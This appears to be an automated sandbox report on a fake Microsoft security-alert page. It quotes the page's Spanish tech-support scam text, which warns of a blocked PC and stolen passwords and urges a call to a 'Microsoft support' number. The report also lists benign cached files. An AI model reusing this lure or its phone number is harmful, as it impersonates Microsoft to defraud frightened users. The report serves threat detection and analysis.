                          Microsoft I Support Microsoft 36 windows Surface Xbox Deals Buy Microsoft 365 Microsoft Search Signin Prod Devices Account & billing Windows Defender - Advertencia de seguridad EL ACCESO A ESTA pc HA BLOQUEADO POR MOTIVOS DE SEGURIDAD Alerta de Microsoft-Wii Su computadora nos ha alertado que ha Sido infectada con un n software espia virus. Los siguientes datos han Sido comprometidos. Ouda X Anlisis r6pido Credenciales de electrnico Contrasehas bancarias de iniciom X Laboral Iniciar sesin en Facebook WdNisDrv Fotos & CRcurnentos Windows Firewall protection Resu Alerta Virus: cdigo de error: #0x268d3(x7) Microsoft El acceso a esta PC ha Sido bloqueado por razones de seguridad. Pngase en contacto con el soporte tcnico de Windows: 900-499-091 (ESPANA-Gratuito) riesgo software espia virus Permitir Llarne al soporte tcnicode Microsoft: ESP A- Gratuito) ESTADO : su pc est en riesgo! 0K Amenaza detectada! TrojanFakealert.356 Alto riesgo A Origen No disponible Actividad
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: Perplexity: mixtral-8x7b-instruct
                          {
"loginform": false,
"reasons": [
"No input fields for username or password are present in the text.",
"No 'Sign in' or 'Log in' button is present in the text.",
"The text is actually a security warning from Microsoft, not a login form."
]
}
                          Microsoft I Support Microsoft 36 windows Surface Xbox Deals Buy Microsoft 365 Microsoft Search Signin Prod Devices Account & billing Windows Defender - Advertencia de seguridad EL ACCESO A ESTA pc HA SIDO BLOQUEADO POR MOTIVOS DE SEGURIDAD  Su computadora nos ha alertado que ha Sido infectada con un Alerta de Microsoft-M n software espia virus. Los siguientes datos han Sido comprometidos. Ouda X Anlisis rapid Credenciales de correo electron ico Contrasehas Iniciar sesiOn en Facetxx)k X Done > Fotos & Documentos Windows Firewall protection Resu Alerta Virus: cdigo de error: #0x268d3(x7) Microsoft El acceso a esta PC ha Sido bloqueado por razones de seguridad. Pngase en contacto con el soporte tcnico de Windows: 900-499-091 (ESPANA-Gratuito) software espia virus Permitir suspension esu egis ro e Llame al soprte de Microsoft: 499091 (ESPANA Gratuito) ESTADO : su pc est en riesgo! Cancelar a Microsoft Soporte de contacto 900-499-091 (ESPANA-Gratuito)

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          Chrome Cache Entry: 100

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 7884, version 1.0
                          Category:downloaded
                          Size (bytes):7884
                          Entropy (8bit):7.971946419873228
                          Encrypted:false
                          SSDEEP:192:xLFDbKO9E3rS3JWBRO/J601FSS5ZUbik3Zy2f0:pd9J5W501otlI
                          MD5:9212F6F9860F9FC6C69B02FEDF6DB8C3
                          SHA1:AC6D71B4D5FDD2B3DABC9A06FF6C001E4251DA0B
                          SHA-256:7D93459D86585BFCDBB7E0376056226ADB25821EE54B96236FE2123E9560929F
                          SHA-512:67317495F4B53E20A9F31C034E456E6C37F387DFFB2C092CAA5159BC441CFCADD02749FFE5BBED1D580D5300A59E48A767EF2C6D9978B474F84C1A2CD095C126
                          Malicious:false
                          Reputation:low
                          URL:https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJfecg.woff2
                          Preview:wOF2..............?....x.............................`..T..L.6..6..6.$..h. ..\....~2.".8. .w.Q.Y,.?$pC.....)bT(i..@X.m...+...D.Q.O.\-?g.U..Z..._...l..!.lKD.Q..>.9v..V..<...Td$.E..,...o..c.t....!...#..8.A..3..cx~n=Di#....U......K.5jXH.].....j.(.6..]{..IDhZ.......R.....[..X".B~.(Su2..../.I.E...T.l%....'.N.aN.2\,7*0.....V.RQ..k~..".1. Lg.zd....}.yyys&D.K.g....)..*..2&%$.nm.\.._.e.tU..I.w;W.|..6..XUv...!......>@.V..'..`.H`...5.7.X.?..@#..:..<.R.|.;K..}.6..IA.C.....z.n.G............[.....z........`.X....D..{<..j...).......FQ..T..m.&s_k[%ZILV.8.l.o.z$.)/]......}..Kg.}..O...o|..>.,U..?..{b<........._.._.06.........R01.@..[......a8..7.V%..B.0F...4 ....q..u#.lg....x....a.=w...8..A6.>f.+.8..Xm@`.m....G.....i..^R}9.aB...?._#.[f.d,V....bG.]...iED.@[.:.....P...........~.{,.x...~.!...C....b.....ze..).:+N....2sd..s..MEp.?^[.k........p..nz...[-.XI.%.."..`..<.2b\.w.VS.a.+......~..J..uGq..)..1...4o3v.Sb......5.w7...-....Wd>..B....R^.4'..B.2G>.en.q..._.@s......

                          Chrome Cache Entry: 101

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):293
                          Entropy (8bit):6.99724085594416
                          Encrypted:false
                          SSDEEP:6:6v/lhPkd5nDsp2je0j0FAyOuEFYzyYzyjU44kCycGNgQ2Vqc/p:6v/7yO8jeXGyoFZYzyjl4zy1twqK
                          MD5:9EB68D2CE05C151BDA542A7A6356E22C
                          SHA1:BAEEEFE4A7AC657C10A5F081841015DE1BCF90DD
                          SHA-256:2D2B7040BC32B397C3C60D800DE9AA7D86404F1874862EBA61BDAA21F1523EB7
                          SHA-512:46BCFB831A39B319BBD7A4626687D00B1327B26828F488A87F617DDED744D404ED9E6FD6FD830AF094976D1FEC1873D3FBB35DE7FD5FF3E731AED5F7ACE162B0
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.d.1.E@...*.{....l+..K.{p....D....}.c._....df.k..(.../aR...4...(."...W..eY.."......i.G.;.km.$Y...n.f.i.6..<..BkM...u9R. ...$Xq..C..qC.s...;)" .!.....b.].{....!wr....8...y..i].......O.......).......IEND.B`.

                          Chrome Cache Entry: 102

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 78 x 68
                          Category:downloaded
                          Size (bytes):949
                          Entropy (8bit):7.611134551779901
                          Encrypted:false
                          SSDEEP:24:ImRyJqzXsWywndMDWXi898BJBjOBO5nEzn9qcUo7PU:I4Aqz8Md59ABgO5nEz9wCPU
                          MD5:DA9D153375DA51A616A7663F1504E3A5
                          SHA1:BD81FE60FE017BFE79BE8C1AFED88B659FF166D9
                          SHA-256:9BB88049C3D3F3C172D97246FA148BB725E727847C37E28C3BE156BE240A0C04
                          SHA-512:8CC15D9FF3C6E72AB2924C44B4722C4D4BCACEF7DC29DFA5B135FFABC431C670DE6FD333264DC916C9E1CBB1B56CBB9924518D7278C07E4F62D2D1747F2C8649
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bc00090f_v.gif
                          Preview:GIF89aN.D..........(.!..9.2..I.D...y.ti.d......Y.T0.*R.L...#........A.:...............`.[q.l....e.`!.......,....N.D.... $.di.%2..@$Y.-.j.x.K.q...p(,p...r.C.8..t..4...v....`..c.M.E8r.....#...$gs%.%...Y#C$....T..yK..}B...(.'..^R...8..R..7.6...A..(.tB.:.7.....$.D...(.......D...7........B...:....f..A...:.o.[.C..K.E5Z.S..9.C..J.`..C........*.o.....LH&$.....M......'&D...B. .p....N....A.<....xP..P".L....$X$..3.....g..-.bY<A1...O......}.e=.UH..U.`....5.#b}c..B. b].q....y.Gt.....{}..kX.....\..X.....(.|.q.."6.q.I...Q.6s.R,z.......@....(gN..Y.*..@..[V.#......qB....z&!..P..'....;S..}..).R..r`+..g...v.w~.5..@}#..H..sLH....R.X...EP.6....f....B<0... ....dP.....Q.t...."..Cx.....W.:L|........4PEKL..A06......\9H..G[=h...t....Z%....6....'.c..v..Q4@.j.0.^}uY@.9l......$.#H."w...(............P(h...(.$,..b.h&U.P.g~]..V..jZ...|C.iY.0.FE.XB..8PC:..$......^:..G.....U.._.p*..5..e2...;&Q....$P. .h...@$.l.....X.~.qA..V...KLP.......;

                          Chrome Cache Entry: 103

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 16 x 16
                          Category:dropped
                          Size (bytes):377
                          Entropy (8bit):5.5857056155757725
                          Encrypted:false
                          SSDEEP:6:NKmsbf/lUvPnklwXENt6F1QVelWkQ9j+mhnnlFzMcI9ocF:PsL9UvPTXIU1QVewkm+mhnnlBvI9ocF
                          MD5:C10BDEC858CB0CF9E6CC5865D5925746
                          SHA1:697C095ED5509E5A5AF0C5EBF2380662AEFFC531
                          SHA-256:B65B47A79E32335D9CA35FF59C6975D2B5808F84DA0DB88D11CE777B33E72AD9
                          SHA-512:7F07C1EDF29CBC427E655B5D3FBBD123228275C55F49EF4E5C0FC1A987F4093C4736FD2DBF03C873630C4FF983D4CA8090D8785D05D7B15B638AE55165984FAC
                          Malicious:false
                          Reputation:low
                          Preview:GIF89a................0/1...GFI......~.........igg..........UTT..........ppp...zwz..._\a...............................................................................................................!.......,.............p.A ...c1l:..."S(....@..l...V..<..E..ib....P.X.L..r.D....................w...........b...Q.......B...Bd......B.........Y..B........B....C... B....BA.;

                          Chrome Cache Entry: 104

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (32180)
                          Category:downloaded
                          Size (bytes):84357
                          Entropy (8bit):5.371098189811456
                          Encrypted:false
                          SSDEEP:1536:QP1vk7i6GUHdXXeyQazBu+4HhiO2wd0uJO1z6/A4fGAub0i4ULgGiyz4npa98Hr7:D4UdWJiz6UAIJ8pa98Hr7
                          MD5:5EF8F94927C4B93DB369713BBCB3D497
                          SHA1:5EF934231388F13DD7874575E90101D023615CA1
                          SHA-256:6806C88AFE0840C35208894C4CEBA911154F696B624614B30B884298C2C3E00D
                          SHA-512:92E1E6A6A37712A7CAEE0B22C1F43D2EBE00D0FECE76EE6850FF9A75EFC8217D887F99C4D07AD4E4EA29B8AB61F3DA8BFAD0A5F14160D5CEC2E8CFBD24419D36
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/jquery.min.js
                          Preview:/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.3",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

                          Chrome Cache Entry: 105

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (7048)
                          Category:downloaded
                          Size (bytes):7208
                          Entropy (8bit):5.039342454206019
                          Encrypted:false
                          SSDEEP:48:MhzYX1UcWOKFOK2K/kewq+VDoI24Vs8H1dl4GRwBQV0tLSUcby4XBLD4e:LUczqZn0sodmGRKTmUcby4ld
                          MD5:8D4FBA5186F02A0C4458986B0CF91667
                          SHA1:785579011ECDDA9E4754CA41649FA2FC06453B52
                          SHA-256:1CFC73A6DB9523C12B6B7F5D009BED19C8799EED001F607BD891A1FD838B7739
                          SHA-512:5DBF3FA7C0DB83903BE8AF7F8A7773E73A70AF8027BC3996C32F4C331A547FBCBF69FA09DB91BEA839958E5DF09A8EA935735EA5D5035D573E8C557E6A3728DA
                          Malicious:false
                          Reputation:low
                          URL:https://cdnjs.cloudflare.com/ajax/libs/froala-editor/2.8.5/css/froala_style.min.css
                          Preview:/*!. * froala_editor v2.8.5 (https://www.froala.com/wysiwyg-editor). * License https://froala.com/wysiwyg-editor/terms/. * Copyright 2014-2018 Froala Labs. */...clearfix::after{clear:both;display:block;content:"";height:0}.hide-by-clipping{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);border:0}img.fr-rounded,.fr-img-caption.fr-rounded img{border-radius:10px;-moz-border-radius:10px;-webkit-border-radius:10px;-moz-background-clip:padding;-webkit-background-clip:padding-box;background-clip:padding-box}img.fr-bordered,.fr-img-caption.fr-bordered img{border:solid 5px #CCC}img.fr-bordered{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}.fr-img-caption.fr-bordered img{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}img.fr-shadow,.fr-img-caption.fr-shadow img{-webkit-box-shadow:0 1px 3px rgba(0,0,0,.12),0 1px 1px 1px rgba(0,0,0,.16);-moz-box-shadow:0 1px 3px rgba(0,0,0,.12),0 1px

                          Chrome Cache Entry: 106

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):945
                          Entropy (8bit):5.912220301858543
                          Encrypted:false
                          SSDEEP:24:+Q1h6A1aWwjx82lY2T3PQVaYbLyJ3VQbqG1Dpl:+u11LNn2bQQtJ3DOl
                          MD5:E6EB3D938F3EBEBD85C71307B38A3BF3
                          SHA1:387223165F8E86F861A09ADB1E3C10A8F2EC7006
                          SHA-256:2B6C8E23B2A2C49AC71393CB3E1740B7E2FCCAA310EE06B68CA27B693D133F8E
                          SHA-512:20941396D66F8EDDE21695D250D01B9240FF9695CD80E4A578F1C4A97D2B061B5C76F5CC1C9C76AB820FA5C89D070FB2B14600627A1F06C2CDB1C28CFF56C65B
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR.............Vu\.....tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:03D886B0FD9211EAAC6AC1595738B2FE" xmpMM:DocumentID="xmp.did:03D886B1FD9211EAAC6AC1595738B2FE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:03D886AEFD9211EAAC6AC1595738B2FE" stRef:documentID="xmp.did:03D886AFFD9211EAAC6AC1595738B2FE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^!.....$IDATx.b...?.)...D0.5.........#1X.......G.{......IEND.B`.

                          Chrome Cache Entry: 107

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):555
                          Entropy (8bit):4.734589619218495
                          Encrypted:false
                          SSDEEP:12:TjeRHVIdtklI5rvy1INGlTF5TF5TF5TF5TF5TFK:neRH68pTPTPTPTPTPTc
                          MD5:7D34D86E35ADE3769B332E032633EBD9
                          SHA1:CBD7FB5217C686A8C5CDB8E9C9C71B611B4F526A
                          SHA-256:338E171ECD2E7B7B1D89C2BED70F9A33477B1345BE879B35A211925B67476DCF
                          SHA-512:73BF84CA367F4221F33294D9C408B97CFC29BDC23843D12EDDDB20D7072A3A0EB0E874E6198E7AD083A65B6F829B6E11F754BB2F6C074EB4D5184F0D7EC34E17
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/img/anim_red.gif
                          Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.24.0</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

                          Chrome Cache Entry: 108

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):555
                          Entropy (8bit):4.734589619218495
                          Encrypted:false
                          SSDEEP:12:TjeRHVIdtklI5rvy1INGlTF5TF5TF5TF5TF5TFK:neRH68pTPTPTPTPTPTc
                          MD5:7D34D86E35ADE3769B332E032633EBD9
                          SHA1:CBD7FB5217C686A8C5CDB8E9C9C71B611B4F526A
                          SHA-256:338E171ECD2E7B7B1D89C2BED70F9A33477B1345BE879B35A211925B67476DCF
                          SHA-512:73BF84CA367F4221F33294D9C408B97CFC29BDC23843D12EDDDB20D7072A3A0EB0E874E6198E7AD083A65B6F829B6E11F754BB2F6C074EB4D5184F0D7EC34E17
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/img/anim_orange.gif
                          Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.24.0</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

                          Chrome Cache Entry: 109

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):1192
                          Entropy (8bit):6.581451718666899
                          Encrypted:false
                          SSDEEP:24:+Q1h6A1aWwjx82lY2T3PQVWNkyJ3VZDq6GC9yoUWGaUb0I:+u11LNn2bQ4pJ3PPCWG9bT
                          MD5:E526E4FF50594A6C4A5D05C18474D6E7
                          SHA1:705609A2BD21C1E3E13666451C75D2C51436C83E
                          SHA-256:D25CF2403704D5208D662AF4EF703D424CEDEAC253A43A1AEC6E60E0DB43837F
                          SHA-512:D75DBDAD41CA7FB223CF910AF6D49C086C7BA574572FD43DF37AA4A9A98952861575FA6F53E5A25FF15990B0EE51D8FF4A5A1C95BD87CA9B49BA4CEFCC96791E
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR.............Vu\.....tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:EED7F621FD9111EA981C95305B8F3A6E" xmpMM:DocumentID="xmp.did:EED7F622FD9111EA981C95305B8F3A6E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EED7F61FFD9111EA981C95305B8F3A6E" stRef:documentID="xmp.did:EED7F620FD9111EA981C95305B8F3A6E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.b8{........o.....#.6......e655}...C~ g...N777.o.$...+.I.&}....1&&......IFFF....y.$.R...$.R.R....../_^r..

                          Chrome Cache Entry: 110

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 16 x 16
                          Category:downloaded
                          Size (bytes):69
                          Entropy (8bit):4.800672923395278
                          Encrypted:false
                          SSDEEP:3:CsDi/NQlZ/lqMkAI/HyjFB0se:N+/NQlOHSjH0/
                          MD5:3AE573D079DCD1D2DA4086F2C0C72C45
                          SHA1:E7C9DABEC81379373476ED23168DCECB9B8C56AA
                          SHA-256:9CCE08AB28E94790CF78C87E37F8690ACBC6C535E4B43AE7B38506B94538E107
                          SHA-512:C1899B5E08F520B08E5F59EE380C5D108DA99F2EAF5F1EF2FE6D078A1ECF92D83E0A86B98DD1E1BAC7B3A360ACEB9975D7815FFE3416954414A85FC487B2F513
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bc1a74d5_v.gif
                          Preview:GIF89a.............!.......,.............i..d......v.'..y..).G..;

                          Chrome Cache Entry: 111

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 80 x 65
                          Category:downloaded
                          Size (bytes):1506
                          Entropy (8bit):7.148565966075018
                          Encrypted:false
                          SSDEEP:24:+hxal1h6A1aWwjx82lY2T3PQVotc04Cc0ayJ3VMc0Qc4c0fGY8Ejidvl+Kx9fMp:+411LNn2bQMhPJ3KeZlL88avl+Ksp
                          MD5:0D3C4EFABB6072EC3312574009BE3EF8
                          SHA1:02D319A4E46538BCADCC5122883E1A0C3E94C123
                          SHA-256:45A676A0EB476E7706E0187D975B612F51F3BB4C26596F991D55F5E68FBEF3E3
                          SHA-512:A8DA194E654AE533863744A6C5CDC4FB95FB27E00F294AC403EFB846637B9070DE448C7C1BBB670DDEFA6958A1BC68419350FE530D887486405832DF245BBD33
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bbbf25aa_v.gif
                          Preview:GIF89aP.A.......=........9.....yn.....f.G........M=......|.=!.............................................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:DF47859C041B11EB821AA74C809F9EB3" xmpMM:DocumentID="xmp.did:DF47859D041B11EB821AA74C809F9EB3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DF47859A041B11EB821AA74C809F9EB3" stRef:documentID="xmp.did:DF47859B041B11EB821AA74C809F9EB3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>................................................................................................

                          Chrome Cache Entry: 112

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGB, non-interlaced
                          Category:downloaded
                          Size (bytes):293
                          Entropy (8bit):6.99724085594416
                          Encrypted:false
                          SSDEEP:6:6v/lhPkd5nDsp2je0j0FAyOuEFYzyYzyjU44kCycGNgQ2Vqc/p:6v/7yO8jeXGyoFZYzyjl4zy1twqK
                          MD5:9EB68D2CE05C151BDA542A7A6356E22C
                          SHA1:BAEEEFE4A7AC657C10A5F081841015DE1BCF90DD
                          SHA-256:2D2B7040BC32B397C3C60D800DE9AA7D86404F1874862EBA61BDAA21F1523EB7
                          SHA-512:46BCFB831A39B319BBD7A4626687D00B1327B26828F488A87F617DDED744D404ED9E6FD6FD830AF094976D1FEC1873D3FBB35DE7FD5FF3E731AED5F7ACE162B0
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bbe46967_v.png
                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.d.1.E@...*.{....l+..K.{p....D....}.c._....df.k..(.../aR...4...(."...W..eY.."......i.G.;.km.$Y...n.f.i.6..<..BkM...u9R. ...$Xq..C..qC.s...;)" .!.....b.].{....!wr....8...y..i].......O.......).......IEND.B`.

                          Chrome Cache Entry: 113

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 120 x 97
                          Category:downloaded
                          Size (bytes):1776
                          Entropy (8bit):7.410616971205723
                          Encrypted:false
                          SSDEEP:48:Sb11LNn2bQlE/J3Tv1L82sAfy6e7+vnwRO674EyLY:wX2HnU6eun7674EyE
                          MD5:8806694DB55D271B6C836433D103AFCD
                          SHA1:A532AE846499FFA93BD6ED8BAAFCBDABB2CC8DA1
                          SHA-256:989F955C24583BE00DEFAB08C4CF80B17FE4C12756686359367144F0506EB8B8
                          SHA-512:A46D75C51701F7FA6BD1BAC01E6FCD5C0EFCE9043D401146004A7E97D96E379CD3D64250D46CB8300648A3467483319EED4C11EE9BBD5E5AF441C09688F4B56E
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bb9bf55a_v.gif
                          Preview:GIF89ax.a......-.'...8.1......k.g...F.@.....&. ...^.Y....L.G;.5*.#...W.Q......|..v.q#.................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:3C513C34041C11EB8023E7F90A16D798" xmpMM:DocumentID="xmp.did:3C513C35041C11EB8023E7F90A16D798"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3C513C32041C11EB8023E7F90A16D798" stRef:documentID="xmp.did:3C513C33041C11EB8023E7F90A16D798"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>................................................................................................

                          Chrome Cache Entry: 114

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGB, non-interlaced
                          Category:downloaded
                          Size (bytes):364
                          Entropy (8bit):7.161449027375991
                          Encrypted:false
                          SSDEEP:6:6v/lhPkd5nDsLiRa6NhNj1aUIXtYRJiTDc7VkC0hWQpPBPFLsfd9EZXlo1p:6v/7yOLiRa6NzJJyusykCmpBFLoGi
                          MD5:E144C3378090087C8CE129A30CB6CB4E
                          SHA1:59DA5466551DE941D0215E45C54AA2CEAF436BE1
                          SHA-256:B13A03E0DB893734298CBE203BF264407636FFE5DAB0A141F83C492D0034DD6A
                          SHA-512:3004885B1DCC8C8544024F3C1345B80AB6B50759F290A3545BFA4ED7EA93426E838B7A04556294298BAD1C6198431FBDE06E999628E45DE10119DD1D4FABE32A
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bbdae210_v.png
                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.\...E@.....TB...-n$...(....5T.7.x.=ZQ...l(n#....WL....N..rY..WY.%I..0.UU/N....|.,K...)...mEQ,.b].p.....8.u]..<....'...ih.....8`.8.........eY..^.o=..........4M..EQ?.B...a.v...q.e..A.^.W.E.4......e.}......+.0........+......m.TI|...3MS0.,{.wq.w.$.>|....0.u.{........IEND.B`.

                          Chrome Cache Entry: 56

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 1920 x 1126, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):386648
                          Entropy (8bit):7.977972541740715
                          Encrypted:false
                          SSDEEP:6144:tLfaMQeft3/wemTdFcUxZynpcty+jmoNuAGBEfY9cH5XyCcuqzhVS9g:tL5QUt3obTdyQypct0oNbY+ZXyCcuqzf
                          MD5:DB2C775D2583118BF4464DD65A58535B
                          SHA1:45413378BF16997DECF585915931305788E55328
                          SHA-256:DE9FBE2DE348E17BD4948011260EF297C4102B69068692DAABA02BF632ACD291
                          SHA-512:C36DE48C37A5E6218D63A1051C3C3D4D0AD493D53DAF693C3474DFA8EAB4E04EA413F50BAC3C5EEEAC4CA1FC807D74D6C1343A4ED4EEFA9CD43B91EDC546900B
                          Malicious:false
                          Reputation:low
